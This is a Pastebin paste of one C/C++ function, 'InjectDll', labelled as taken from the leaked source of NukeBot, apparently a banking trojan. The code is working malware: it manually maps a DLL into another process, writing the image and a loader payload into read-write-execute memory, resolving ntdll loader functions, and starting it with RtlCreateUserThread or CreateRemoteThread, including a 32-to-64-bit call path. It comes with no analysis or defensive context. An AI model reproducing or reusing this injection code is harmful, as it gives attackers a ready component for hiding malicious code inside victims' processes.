SHARE
TWEET

InjectDll from NukeBot Leaked Source

PepperPotts Jan 2nd, 2019 178 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. BOOL InjectDll(BYTE *dllBuffer, HANDLE hProcess, BOOL x64)
  2. {
  3. #ifndef _WIN64
  4.    if(!hProcess)
  5.       return FALSE;
  6.  
  7.    IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *) dllBuffer;
  8.    IMAGE_NT_HEADERS64 *ntHeaders64;
  9.    IMAGE_NT_HEADERS32 *ntHeaders32;
  10.    if(x64)
  11.       ntHeaders64 = (IMAGE_NT_HEADERS64 *) (dllBuffer + dosHeader->e_lfanew);
  12.    else
  13.       ntHeaders32 = (IMAGE_NT_HEADERS32 *) (dllBuffer + dosHeader->e_lfanew);
  14.  
  15.    DWORD64 dllRemoteAddress = NULL;
  16.    if(x64)
  17.    {
  18.       dllRemoteAddress = VirtualAllocEx64(hProcess, NULL, ntHeaders64->OptionalHeader.SizeOfImage,
  19.          MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  20.    }
  21.    else
  22.    {
  23.       dllRemoteAddress = (DWORD64) Funcs::pVirtualAllocEx(hProcess, NULL, ntHeaders32->OptionalHeader.SizeOfImage,
  24.          MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  25.    }
  26.    if(!dllRemoteAddress)
  27.       return FALSE;
  28.  
  29.    DWORD64 payloadRemoteAddress = NULL;
  30.    if(x64)
  31.    {
  32.       payloadRemoteAddress = VirtualAllocEx64(hProcess, NULL, sizeof(InjectData64) + payloadSize64,
  33.          MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  34.    }
  35.    else
  36.    {
  37.      payloadRemoteAddress = (DWORD64) Funcs::pVirtualAllocEx(hProcess, NULL, sizeof(InjectData32) + payloadSize32,
  38.        MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  39.    }
  40.    if(!payloadRemoteAddress)
  41.       return FALSE;
  42.  
  43.    PVOID injectData;
  44.    IMAGE_SECTION_HEADER *sectionHeader;
  45.    
  46.    if(x64)
  47.    {
  48.       sectionHeader = (IMAGE_SECTION_HEADER *) (ntHeaders64 + 1);
  49.       if(!WriteProcessMemory64(hProcess, dllRemoteAddress, dllBuffer, ntHeaders64->OptionalHeader.SizeOfHeaders, NULL))
  50.          return FALSE;
  51.  
  52.       for(DWORD i = 0; i < ntHeaders64->FileHeader.NumberOfSections; ++i)
  53.       {
  54.          if(sectionHeader[i].SizeOfRawData == 0)
  55.             continue;  
  56.          if(!WriteProcessMemory64(hProcess, dllRemoteAddress + sectionHeader[i].VirtualAddress,
  57.             dllBuffer + sectionHeader[i].PointerToRawData, sectionHeader[i].SizeOfRawData, NULL))
  58.          {
  59.             return FALSE;
  60.          }
  61.       }
  62.  
  63.       InjectData64 injectData64;
  64.       injectData64.base = (DWORD64) dllRemoteAddress;
  65.  
  66.       injectData64.baseRelocation = (DWORD64) dllRemoteAddress +
  67.          ntHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
  68.  
  69.       injectData64.importDesc = (DWORD64) dllRemoteAddress +
  70.          ntHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
  71.  
  72.       DWORD64 hNtdll64 = GetModuleHandle64((wchar_t *) Strs::wNtdll);
  73.  
  74.       injectData64.aRtlInitAnsiString            = GetProcAddress64(hNtdll64, (char *) Strs::rtlInitAnsiString);
  75.       injectData64.aRtlAnsiStringToUnicodeString = GetProcAddress64(hNtdll64, (char *) Strs::rtlAnsiStringToUnicodeString);
  76.       injectData64.aLdrLoadDll                   = GetProcAddress64(hNtdll64, (char *) Strs::ldrLoadDll);
  77.       injectData64.aLdrGetProcedureAddress       = GetProcAddress64(hNtdll64, (char *) Strs::ldrGetProcedureAddress);
  78.       injectData64.aRtlFreeUnicodeString         = GetProcAddress64(hNtdll64, (char *) Strs::rtlFreeUnicodeString);
  79.  
  80.       injectData = &injectData64;
  81.  
  82.       if(!WriteProcessMemory64(hProcess, (DWORD64) payloadRemoteAddress, injectData, sizeof(InjectData64), NULL))
  83.          return FALSE;
  84.  
  85.       if(!WriteProcessMemory64(hProcess, (DWORD64) payloadRemoteAddress + sizeof(InjectData64), (LPVOID) payload64, payloadSize64, NULL))
  86.          return FALSE;
  87.  
  88.       DWORD64 hThread;
  89.  
  90.       struct CLIENT_ID { DWORD64 UniqueProcess; DWORD64 UniqueThread; };
  91.       CLIENT_ID clientId;
  92.  
  93.       DWORD64 pRtlCreateUserThread = GetProcAddress64(hNtdll64, (char *) Strs::rtlCreateUserThread);
  94.       if(X64Call(pRtlCreateUserThread, 10, (DWORD64) hProcess, (DWORD64) NULL,  (DWORD64) FALSE, (DWORD64) 0,  (DWORD64) 0,  (DWORD64) 0,
  95.          (DWORD64) payloadRemoteAddress + sizeof(InjectData64), (DWORD64) payloadRemoteAddress, (DWORD64) &hThread, (DWORD64) &clientId))
  96.       {
  97.          return FALSE;
  98.       }
  99.    }
  100.    else
  101.    {
  102.       sectionHeader = (IMAGE_SECTION_HEADER *) (ntHeaders32 + 1);
  103.       if(!Funcs::pWriteProcessMemory(hProcess, (PVOID) dllRemoteAddress, dllBuffer, ntHeaders32->OptionalHeader.SizeOfHeaders, NULL))
  104.          return FALSE;
  105.          
  106.       for(DWORD i = 0; i < ntHeaders32->FileHeader.NumberOfSections; ++i)
  107.       {
  108.          if(sectionHeader[i].SizeOfRawData == 0)
  109.             continue;  
  110.          if(!Funcs::pWriteProcessMemory(hProcess, (PVOID) ((BYTE *) dllRemoteAddress + sectionHeader[i].VirtualAddress),
  111.             (PVOID) ((BYTE *) dllBuffer + sectionHeader[i].PointerToRawData), sectionHeader[i].SizeOfRawData, NULL))
  112.          {
  113.             return FALSE;
  114.          }
  115.       }
  116.  
  117.       InjectData32 injectData32;
  118.       injectData32.base = (DWORD) dllRemoteAddress;
  119.  
  120.       injectData32.baseRelocation = (DWORD) (IMAGE_BASE_RELOCATION *) ((BYTE *) dllRemoteAddress +
  121.          ntHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
  122.  
  123.       injectData32.importDesc = (DWORD) (IMAGE_IMPORT_DESCRIPTOR *) ((BYTE *) dllRemoteAddress +
  124.          ntHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
  125.  
  126.       HMODULE hNtdll = Funcs::pLoadLibraryA(Strs::ntdll);
  127.  
  128.       injectData32.aRtlInitAnsiString            = (DWORD) GetProcAddress(hNtdll, Strs::rtlInitAnsiString);
  129.       injectData32.aRtlAnsiStringToUnicodeString = (DWORD) GetProcAddress(hNtdll, Strs::rtlAnsiStringToUnicodeString);
  130.       injectData32.aLdrLoadDll                   = (DWORD) GetProcAddress(hNtdll, Strs::ldrLoadDll);
  131.       injectData32.aLdrGetProcedureAddress       = (DWORD) GetProcAddress(hNtdll, Strs::ldrGetProcedureAddress);
  132.       injectData32.aRtlFreeUnicodeString         = (DWORD) GetProcAddress(hNtdll, Strs::rtlFreeUnicodeString);
  133.  
  134.       injectData = &injectData32;
  135.  
  136.       if(!Funcs::pWriteProcessMemory(hProcess, (PVOID) payloadRemoteAddress, injectData, sizeof(InjectData32), NULL))
  137.          return FALSE;
  138.  
  139.       if(!Funcs::pWriteProcessMemory(hProcess, (BYTE *) payloadRemoteAddress + sizeof(InjectData32), (LPVOID) payload32, payloadSize32, NULL))
  140.          return FALSE;
  141.  
  142.       OSVERSIONINFOEXA osVersion    = { 0 };
  143.       osVersion.dwOSVersionInfoSize = sizeof(osVersion);
  144.       Funcs::pGetVersionExA((LPOSVERSIONINFOA) &osVersion);
  145.       if(osVersion.dwMajorVersion <= 5)
  146.       {
  147.          if(!Funcs::pCreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE) ((BYTE *) payloadRemoteAddress + sizeof(InjectData32)), (PVOID) payloadRemoteAddress, 0, NULL))
  148.             return FALSE;
  149.       }      
  150.       else
  151.       {
  152.          HANDLE    hThread;
  153.          CLIENT_ID clientId;
  154.          if(Funcs::pRtlCreateUserThread(hProcess, NULL, FALSE, 0, 0, 0, ((BYTE *) payloadRemoteAddress + sizeof(InjectData32)), (PVOID) payloadRemoteAddress, &hThread, &clientId))
  155.             return FALSE;  
  156.       }
  157.    }
  158. #endif
  159.    return TRUE;
  160. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top